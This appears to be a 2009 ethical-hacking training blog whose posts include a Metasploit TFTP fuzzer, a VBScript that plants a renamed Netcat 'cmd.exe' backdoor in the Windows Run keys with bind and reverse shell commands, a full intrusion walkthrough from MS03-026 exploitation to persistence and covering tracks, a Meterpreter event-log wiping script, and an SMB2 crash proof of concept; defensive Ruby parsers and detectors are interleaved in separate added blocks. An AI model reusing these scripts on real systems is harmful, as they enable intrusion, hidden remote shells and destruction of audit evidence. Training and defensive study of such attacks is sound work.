Sunday, November 22, 2009

Simple FTP Fuzzer

Guys, want to see the FTP Fuzzer?
Here is an example: a Metasploit auxiliary module that sends a 3Com TFTP server write requests with an ever-longer transfer-mode string...

#Metasploit

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'        => '3Com TFTP Fuzzer',
      'Version'     => '$Revision: 1 $',
      'Description' => '3Com TFTP Fuzzer Passes Overly Long Transport Mode String',
      'Author'      => 'Your name here',
      'License'     => MSF_LICENSE
    )
    register_options([
      Opt::RPORT(69)
    ], self.class)
  end

  def run_host(ip)
    # Create an unbound UDP socket
    udp_sock = Rex::Socket::Udp.create(
      'Context' => {
        'Msf'        => framework,
        'MsfExploit' => self
      }
    )
    count = 10                  # Initial length of the mode string
    while count < 2000          # Grow it in steps of 10 up to 2000 bytes
      evil = "A" * count        # Mode string: count bytes of "A"
      # TFTP write request: opcode 2 (WRQ), filename "A", NUL, mode string, NUL
      pkt = "\x00\x02" + "\x41" + "\x00" + evil + "\x00"
      udp_sock.sendto(pkt, ip, datastore['RPORT'])  # Send the packet
      print_status("Sending: #{evil}")               # Status update
      resp = udp_sock.get(1)                         # Wait up to 1s for a reply
      count += 10
    end
  end
end
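As an added example that is not part of the original post, here is the defender's side of the same packet format: a TFTP request parser that flags the overly long or unknown transfer-mode string the fuzzer above sends. The 128-byte field limit, and the helper names fuzzer_packet and parse_tftp_request, are my assumptions.

```ruby
# Added example: validates TFTP RRQ/WRQ packets; not part of the original post.
TFTP_MODES = %w[netascii octet mail].freeze
MAX_FIELD  = 128  # assumption: upper bound for the filename and mode fields

# Same packet layout the fuzzer above sends: WRQ, filename "A", mode of `count` "A"s.
def fuzzer_packet(count)
  "\x00\x02".b + "A".b + "\x00".b + ("A" * count).b + "\x00".b
end

# Parses a TFTP read/write request and reports what is wrong with it.
# Raises ArgumentError for packets that are not even structurally valid.
def parse_tftp_request(pkt)
  pkt = pkt.b
  raise ArgumentError, 'packet too short' if pkt.bytesize < 4
  opcode = pkt.byteslice(0, 2).unpack1('n')          # 1 = RRQ, 2 = WRQ
  raise ArgumentError, "not a RRQ/WRQ (opcode #{opcode})" unless [1, 2].include?(opcode)
  # Two NUL-terminated strings follow the opcode: filename and transfer mode.
  filename, mode, rest = pkt.byteslice(2..-1).split("\x00".b, 3)
  raise ArgumentError, 'missing NUL terminator' if rest.nil?
  raise ArgumentError, 'trailing bytes after mode' unless rest.empty?
  problems = []
  problems << 'empty filename' if filename.empty?
  problems << "filename too long (#{filename.bytesize} bytes)" if filename.bytesize > MAX_FIELD
  problems << "mode too long (#{mode.bytesize} bytes)" if mode.bytesize > MAX_FIELD
  # RFC 1350 modes are case-insensitive; anything else is a protocol violation.
  problems << "unknown mode #{mode.byteslice(0, 16).inspect}" unless TFTP_MODES.include?(mode.downcase)
  { opcode: opcode == 1 ? :rrq : :wrq, filename: filename, mode: mode, problems: problems }
end

if __FILE__ == $PROGRAM_NAME
  puts parse_tftp_request("\x00\x01config.bin\x00octet\x00").inspect
  puts parse_tftp_request(fuzzer_packet(500))[:problems].inspect
end
```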

Tuesday, November 10, 2009

Metasploit Framework 3.3 No GUI & Web

As of Metasploit Framework 3.3, msfgui and msfweb will no longer be supported.

:) hooray...

Tutorial: VBScript in Action

Here is an example of a VBScript that enables Remote Desktop and plants a Trojan or backdoor (such as Netcat) in the registry, also known as a persistent Netcat.

' This VBScript will do the following:
'
' 1. Enable Remote Desktop
' 2. Plant Trojan or Backdoor in the Registry
'
' Rename your Netcat (nc.exe) as winntsvr.exe as a "camouflage"

Dim objShell, RegLocate
Set objShell = WScript.CreateObject("WScript.Shell")
On Error Resume Next

' Enable Remote Desktop (fDenyTSConnections = 0 allows connections)
RegLocate = "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"
objShell.RegWrite RegLocate, 0, "REG_DWORD"

' Plant Trojan or Backdoor in the Registry (Run and RunOnce keys)
RegLocate = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update"
objShell.RegWrite RegLocate, "C:\WINDOWS\System32\winntsvr -v -L -p443 -d -e cmd.exe", "REG_SZ"

RegLocate = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update"
objShell.RegWrite RegLocate, "C:\WINDOWS\System32\winntsvr -v -L -p443 -d -e cmd.exe", "REG_SZ"

' Bind Connect (the target listens, the attacker connects in)
' On the Target: winntsvr -v -L -p443 -d -e cmd.exe
' On the Attacker: nc -v 131.107.1.254 443

' Reverse Connect (the target connects out to the attacker's listener)
' On the Target: winntsvr -v 131.107.1.222 443 -d -e cmd.exe
' On the Attacker: nc -v -l -p443

WScript.Quit
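An added example, not part of the original post: auditing the Run and RunOnce keys the script above writes to, over constructed "reg query" output, and flagging values whose command line has the traits of a Netcat-style shell regardless of what the binary was renamed to. The sample output, the indicator list and the audit_autoruns name are my assumptions.

```ruby
# Added example: audits Run/RunOnce entries for a planted listener; not from the original post.
# Constructed sample in the format "reg query <key>" prints on Windows XP/2003.
SAMPLE_REG_QUERY = <<~'REG'
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
      ctfmon    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
      Update    REG_SZ    C:\WINDOWS\System32\winntsvr -v -L -p443 -d -e cmd.exe

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
      Update    REG_SZ    C:\WINDOWS\System32\winntsvr -v 131.107.1.222 443 -d -e cmd.exe
REG

# Command-line traits of a Netcat-style shell, whatever the binary was renamed to.
NETCAT_INDICATORS = {
  'spawns cmd.exe (-e)'         => /\s-e\s+cmd(?:\.exe)?\b/i,
  'persistent listener (-L/-l)' => /\s-[Ll]\b/,
  'listens on a port (-p)'      => /\s-p\s*\d+\b/,
  'detaches from console (-d)'  => /\s-d\b/
}.freeze

# Returns one finding per autostart value whose data spawns a shell plus at
# least one other Netcat trait. Value names with spaces are not handled (assumption).
def audit_autoruns(reg_output)
  findings = []
  key = nil
  reg_output.each_line do |raw|
    line = raw.strip
    next if line.empty?
    if line.start_with?('HKEY_')
      key = line
      next
    end
    m = line.match(/\A(\S+)\s+(REG_\w+)\s+(.*)\z/)   # <name> <type> <data>
    next unless m && key
    name, _type, data = m.captures
    reasons = NETCAT_INDICATORS.select { |_, rx| data.match?(rx) }.keys
    next unless reasons.include?('spawns cmd.exe (-e)') && reasons.size >= 2
    findings << { key: key, name: name, command: data, reasons: reasons }
  end
  findings
end
```

The check is intentionally keyed on the command line, not the file name, because the script above relies on renaming nc.exe to winntsvr.exe.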

Netcat and AntiVirus (bypass) ...

If your Netcat is detected by AntiVirus, you can do something with it.

Check this out:
http://www.packetstormsecurity.org/papers/virus/Taking_Back_Netcat.pdf

Good tutorial :)

Tutorial: Complete Hacking Steps

Complete Hacking Steps (TEST-XP2 vs DEN-WEB2) - Classic Method 

TEST-XP2 = 131.107.1.222
DEN-WEB2 = 131.107.1.254

Step 1: Information Gathering (Scanning)

Scan Target with Nmap:
nmap -A 131.107.1.254

Step 2: Vulnerability Identification

Search Google for vulnerabilities affecting the services found on 131.107.1.254 in Step 1.

Example: MS03-026 (MS-RPC DCOM vulnerability). Alternatively, scan with the Nessus vulnerability scanner.

Step 3: Gain Access/Exploitation

Use Metasploit Framework 2.x or 3.x and find the module for the vulnerability (e.g. MS03-026):

>> Metasploit 2.x

msf > use msrpc_dcom_ms03_026
msf > set PAYLOAD win32_bind
msf > set RHOST 131.107.1.254
msf > set LPORT 5555
msf > exploit

>> Metasploit 3.x

msf > use windows/dcerpc/ms03_026_dcom
msf > set PAYLOAD windows/shell/bind_tcp
msf > set RHOST 131.107.1.254
msf > set LPORT 5555
msf > exploit

Step 4: Maintain Access

Ensure that TFTPD32 (the TFTP server) is running on TEST-XP2.

Transfer the necessary scripts to the target...
C:\WINDOWS\System32>tftp -i 131.107.1.222 GET start.cmd
C:\WINDOWS\System32>tftp -i 131.107.1.222 GET cleanup.cmd

Run the script...
C:\WINDOWS\System32>start.cmd

On TEST-XP2 machine, do the following:

Connect via Remote Desktop ...
User: myadmin
Password: P@ssw0rd

Open a new command prompt.
Launch Netcat to connect to the open port 443 on the remote machine...
Z:\Tools\NC>nc -v 131.107.1.254 443

Open another new command prompt.
Force the Target machine to reboot ...

Option 1: PSShutdown
Z:\Tools\SysinternalsSuite>psshutdown -r -f -u myadmin -p P@ssw0rd \\131.107.1.254

Option 2: Metasploit module
msf > use msasn1_ms04_007_killbill
msf > set PAYLOAD win32_bind
msf > set RHOST 131.107.1.254
msf > exploit

After the reboot, log on to the DEN-WEB2 machine with:
User: administrator
Password: P@ssw0rd

Switch to TEST-XP2 machine.

You should see your Netcat session connect.
From now on you can connect to the target machine at any time.

If not, re-run the command:

Z:\Tools\NC>nc -v 131.107.1.254 443

Step 5: Cover Tracks/Housekeeping

Close your Metasploit Framework console window.
Switch to the Netcat opened command prompt.

Run the housekeeping script...

C:\WINDOWS\System32>cleanup.cmd

Check the Audit settings and Event logs. All should be cleared.

Monday, November 9, 2009

New Security Books - Recommended by Me!

Check this out:

Nmap Network Scanning
http://www.amazon.com/Nmap-Network-Scanning-Official-Discovery/dp/0979958717/ref=sr_1_1?ie=UTF8&s=books&qid=1257826537&sr=8-1

Professional Penetration Tester
http://www.amazon.com/Professional-Penetration-Testing-Creating-Operating/dp/1597494259/ref=sr_1_1?ie=UTF8&s=books&qid=1257826622&sr=1-1

I have read these books and I found that they discuss a lot of interesting topics. A must-have for security professionals.

For DVD contents, please email me.

Tuesday, November 3, 2009

Metasploit Framework 3.x Meterpreter Script

In the last step of hacking, we know that we need to "clear the tracks", also known as "housekeeping". If you use a Meterpreter payload, you can run this script to clear the logs on the victim machine:

ClearLogs.rb

# Clears Windows Event Logs
# ('client' is the Meterpreter session object that the script environment provides)

evtlogs = [
  'security',
  'system',
  'application',
  'directory service',
  'dns server',
  'file replication service'
]
puts("Clearing Event Logs, this will leave an event 517")
evtlogs.each do |evl|
  puts("Clearing the #{evl} Event Log")
  log = client.sys.eventlog.open(evl)
  log.clear
end
puts("All Clear! You are a Ninja!")

Save it and run it from within Meterpreter:

meterpreter > run clearlogs

and Bingo! all logs are cleared...
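The defender's counterpart to Step 5 of the hacking steps above and to this ClearLogs script, as an added example that belongs to neither post: clearing a log leaves a record of its own, so a log review should alert on it. The CSV export below is constructed; 1102 and 104 are the Vista-and-later counterparts of the event 517 the script mentions, and detect_log_clearing is my name for the check.

```ruby
require 'csv'

# Event IDs written when a log is cleared. 517: Security log cleared (2000/XP/2003),
# 1102: Security log cleared (Vista and later), 104: System log cleared (Vista and later).
LOG_CLEARED = { 'Security' => [517, 1102], 'System' => [104] }.freeze

# Constructed sample export; the columns are what a CSV dump of the event logs carries.
SAMPLE_EVENTS = <<~CSV
  host,time,log,event_id,source,message
  DEN-WEB2,2009-11-03 10:12:01,Security,528,Security,Successful Logon: myadmin
  DEN-WEB2,2009-11-03 10:12:45,Security,517,Security,The audit log was cleared
  DEN-WEB2,2009-11-03 10:13:00,Application,1000,Application Error,Faulting application
  TEST-VISTA,2009-11-03 11:02:10,Security,1102,Microsoft-Windows-Eventlog,The audit log was cleared
  TEST-VISTA,2009-11-03 11:02:11,System,104,Microsoft-Windows-Eventlog,The System log file was cleared
  TEST-VISTA,2009-11-03 11:05:00,System,7036,Service Control Manager,Service entered the running state
CSV

# Returns one alert per log-cleared event. history_lost is true when that event is
# the oldest record left in its log, i.e. nothing from before the clear survived.
def detect_log_clearing(csv_text)
  rows = CSV.parse(csv_text, headers: true)
  oldest = {}
  rows.each do |r|
    k = [r['host'], r['log']]
    oldest[k] = r['time'] if oldest[k].nil? || r['time'] < oldest[k]
  end
  rows.each_with_object([]) do |r, alerts|
    id = r['event_id'].to_i
    next unless (LOG_CLEARED[r['log']] || []).include?(id)
    alerts << { host: r['host'], log: r['log'], event_id: id, time: r['time'],
                history_lost: r['time'] == oldest[[r['host'], r['log']]] }
  end
end
```

A log whose oldest surviving record is the clear event itself is the strongest sign of housekeeping; forwarding logs to a separate collector keeps the pre-clear records out of the attacker's reach.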

Wednesday, October 7, 2009

Immunity Debugger

Immunity Debugger is a powerful new way to write exploits, analyze malware, and reverse engineer binary files. It builds on a solid user interface with function graphing, the industry's first heap analysis tool built specifically for heap creation, and a large and well supported Python API for easy extensibility.

- A debugger with functionality designed specifically for the security industry
- Cuts exploit development time by 50%
- Simple, understandable interfaces
- Robust and powerful scripting language for automating intelligent debugging
- Lightweight and fast debugging to prevent corruption during complex analysis
- Connectivity to fuzzers and exploit development tools

Check it out:
http://www.immunityinc.com/products-immdbg.shtml

It's Free!!!

Vulnerabilities in SMB Could Allow Remote Code Execution

Check this out:
http://www.microsoft.com/technet/security/advisory/975497.mspx
and this...
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103

Credit: http://g-laurent.blogspot.com/

I have personally tested with Windows Vista SP2 and Windows Server 2008 SP2.
All worked fine...

It's actually caused by the SRV2.SYS driver used by Vista, Windows Server 2008 and Windows 7 RC. It does not seem to affect Windows Server 2003, Windows XP and Windows 2000.

PoC:

#!/usr/bin/python
# When SMB2.0 receives a "&" char in the "Process Id High" SMB header field
# it dies with a PAGE_FAULT_IN_NONPAGED_AREA

from socket import socket

host = "IP_ADDR", 445  # IP_ADDR is a placeholder for the test host

buff = (

"\x00\x00\x00\x90" # NetBIOS session message, length 0x90 (144) bytes follow
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Command 0x72 Negotiate Protocol, NT status (first 3 bytes)
"\x00\x18\x53\xc8" # NT status (last byte), Flags 0x18, Flags2 0xc853
"\x00\x26"         # Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" # Signature, Reserved, TID, PID
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" # UID, MID, WordCount 0, ByteCount 0x6d, dialect list...
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
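An added example, not part of the original post: the same SMB header fields read from the defender's side, in Ruby. build_negotiate reconstructs a Negotiate Protocol request with a chosen Process ID High so that inspect_smb, the kind of check an IDS preprocessor or a service test harness could run, can be exercised offline; both names are my assumptions.

```ruby
# Added example: SMB1 header inspection; not part of the original post.
SMB_MAGIC         = "\xFFSMB".b
SMB_COM_NEGOTIATE = 0x72

# Builds a NetBIOS-framed SMB1 Negotiate Protocol request. pid_high: 0 is the
# normal value; the PoC above puts "\x00\x26" on the wire, i.e. 0x2600 little-endian.
def build_negotiate(pid_high: 0)
  dialects = ['PC NETWORK PROGRAM 1.0', 'LANMAN1.0', 'NT LM 0.12', 'SMB 2.002']
  data = dialects.map { |d| "\x02".b + d + "\x00".b }.join
  # Header after the magic: command, NT status, flags, flags2, PID high,
  # 8-byte signature, reserved, TID, PID, UID, MID (all little-endian).
  hdr = SMB_MAGIC + [SMB_COM_NEGOTIATE, 0, 0x18, 0xc853, pid_high].pack('CVCvv') +
        ("\x00" * 8).b + [0, 0xffff, 0xfeff, 0, 0].pack('v5')
  body = [0, data.bytesize].pack('Cv') + data        # word count 0, byte count
  msg = hdr + body
  "\x00".b + [msg.bytesize].pack('N').byteslice(1, 3) + msg  # NetBIOS session message
end

# Parses the NetBIOS + SMB header and reports the anomalies worth alerting on.
def inspect_smb(pkt)
  pkt = pkt.b
  return { error: 'too short for NetBIOS + SMB header' } if pkt.bytesize < 36
  nb_len = ("\x00".b + pkt.byteslice(1, 3)).unpack1('N')
  hdr = pkt.byteslice(4, 32)
  return { error: 'bad SMB magic' } unless hdr.byteslice(0, 4) == SMB_MAGIC
  cmd, _status, _flags, _flags2, pid_high = hdr.byteslice(4, 10).unpack('CVCvv')
  findings = []
  findings << "NetBIOS length #{nb_len} != #{pkt.bytesize - 4} bytes carried" if nb_len != pkt.bytesize - 4
  if cmd == SMB_COM_NEGOTIATE && pid_high != 0
    findings << format('non-zero Process ID High 0x%04x in Negotiate Protocol', pid_high)
  end
  { command: cmd, pid_high: pid_high, findings: findings }
end
```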

Tuesday, August 11, 2009

Vmware Virtual Machine Image Files Unauthorized Usage

For those who use the CEH/ECSA/LPT and CHFI VMware virtual machine image files "Created by Semi", please do not hesitate to inform me, as I'm tracking the usage of those files. Any illegal or unauthorized usage detected should not be tolerated, as I created them for the purpose of delivering EC-Council security related courses/training.

- Semi

Thursday, July 23, 2009

Sample EC-Council Exam Questions

Those who would like some samples of the EC-Council exam questions (with answers) can request them directly from me. Just email me and get free samples of CEH, CHFI, EDRP and ECSA questions and answers for your practice or exercise purposes.

- Semi

Wednesday, July 22, 2009

Nmap 5.0 Released

Nmap by Fyodor is one of my favourite hacking and penetration testing tools, besides hping2, scanline, unicornscan and xprobe2.

Recently the latest Nmap 5.0 was released by insecure.org. It has more than 600 significant changes. The top 5 improvements in Nmap include Ncat, Ndiff and NSE.

For more info, refer to: http://www.insecure.org

- Semi

Monday, June 15, 2009

IIS 6.0 WebDav Vulnerability Scan with Nmap

The latest Nmap 4.85BETA has been released and now supports scanning for the recent IIS 6.0 WebDAV vulnerability.

Syntax:
nmap --script http-iis-webdav-vuln -p80,8080

Output example:
80/tcp open  http    syn-ack
|_ http-iis-webdav-vuln: WebDAV is ENABLED. Vulnerable folders discovered: /secret, /webdav

Metasploit Framework 3.3 also added an auxiliary module for the same check.

To update your MSF, ensure that you have an Internet connection, then type:

cd /pentest/exploit/framework3
svn update

Then, in msfconsole, list the auxiliary modules to find it:

show auxiliary

- Semi

Wednesday, April 1, 2009

iFrame Injection Attack

Recently, I found several websites that were attacked by "JS/Kryptik.B.Trojan", which injects iFrames into the HTML and PHP files.

Visit this site for more info:
http://www.diovo.com/2009/03/hidden-iframe-injection-attacks

One of our partners has appointed us to clean up the infected files. We provide this kind of service upon request.

- Semi

Penetration Testing and Vulnerability Assessment

A good website for those who are interested in Penetration Testing and Vulnerability Assessment:
http://www.vulnerabilityassessment.co.uk

- Semi

Monday, March 23, 2009

Speaking Engagement

If you are interested in inviting us for seminars or workshops, please contact us directly via email. Please let us know the schedule at least 2 weeks before the commencing date.

Topics include:
1. Network Security & Digital Forensics
2. Security Awareness Programme
3. Ethical Hacking
4. Penetration Testing
5. Microsoft, Cisco, Novell and CIW related topics

- Semi

Saturday, March 21, 2009

Customized Training

Our current customized training:

- Wireshark Network Security and Forensics
- Penetration Testing with BackTrack (BT3)
- Metasploit: Tactical Exploitation

All training is delivered as Instructor-Led Training (ILT).

- Semi

Friday, March 20, 2009

Important Update -- Regarding My Personal Blog

Important Update:
Due to some technical problems, I regret to inform you that my personal blog, http://semiyulianto.blogspot.com, will no longer be active. All future blog posts such as tutorials, news, updates and training related matters will be posted here in our official blog.

- Semi

Thursday, March 19, 2009

Recent Incidents

Just for your info:
Recently my personal Yahoo and GMail email accounts were "hijacked" by someone who I suspect was one of my CEH students from the previous batch in 2008.
I believe this student was not happy for an unknown reason. I have traced some evidence from emails forwarded by one of my friends. I'm currently still hunting down the suspect.

If you happen to receive emails from:
semi_y2000@yahoo.com and/or semi.yulianto@gmail.com
these emails are fake and NOT TRUSTED. Please ignore them, as the perpetrator/hijacker was trying to do some bad things. So, please be AWARE!!!

- Semi

Welcome to FlexiTrain Official Blog

This blog is created to better support our clients and customers as well as students who have attended our training. Feel free to send us your comments and suggestions. Contact us: semi.yulianto@flexi-train.com or belly@flexi-train.com

- Semi